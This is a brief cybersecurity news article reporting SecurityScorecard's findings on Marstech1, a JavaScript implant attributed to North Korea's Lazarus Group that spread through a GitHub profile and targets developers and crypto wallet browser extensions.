Lazarus Group Unleashes Marstech1: A New JavaScript Threat Targeting Developers

The Lazarus Group, a well-known North Korean cybercriminal organization, has been caught using a previously unknown JavaScript-based malware named Marstech1. This new threat specifically targets developers, infiltrating open-source repositories and posing a serious supply chain risk.

How the Attack Works

Security researchers at SecurityScorecard discovered that the malware was being spread through a GitHub profile called "SuccessFriend," active since July 2024 but now deleted. The implant collects system information, modifies browser extensions, and can be embedded within websites and NPM packages, making it particularly dangerous for web and software developers.

Since its first appearance in December 2024, the attack has affected at least 233 victims across the U.S., Europe, and Asia. Investigators also found two distinct versions of the malware—one in the GitHub repository and another deployed from a command-and-control (C2) server, suggesting it is still under development.

Aimed at Crypto Wallets & Software Developers

The primary goal of Marstech1 appears to be compromising cryptocurrency wallets like MetaMask, Exodus, and Atomic. Once inside a system, it scans Chromium-based browsers across different operating systems and alters extension settings, potentially redirecting or stealing crypto assets.

Additionally, the malware can download extra payloads from a secondary server (port 3001), giving attackers more control over infected devices. The campaign's ties to Lazarus Group's blockchain-related interests raise concerns about future attacks targeting financial platforms.

The Bigger Picture

Lazarus Group continues to evolve its attack strategies, with developers and crypto-related businesses becoming prime targets. Cybersecurity researchers warn that the supply chain attack vector is growing, making it critical for companies to stay ahead of emerging threats.

For ongoing updates on cybersecurity risks, stay tuned.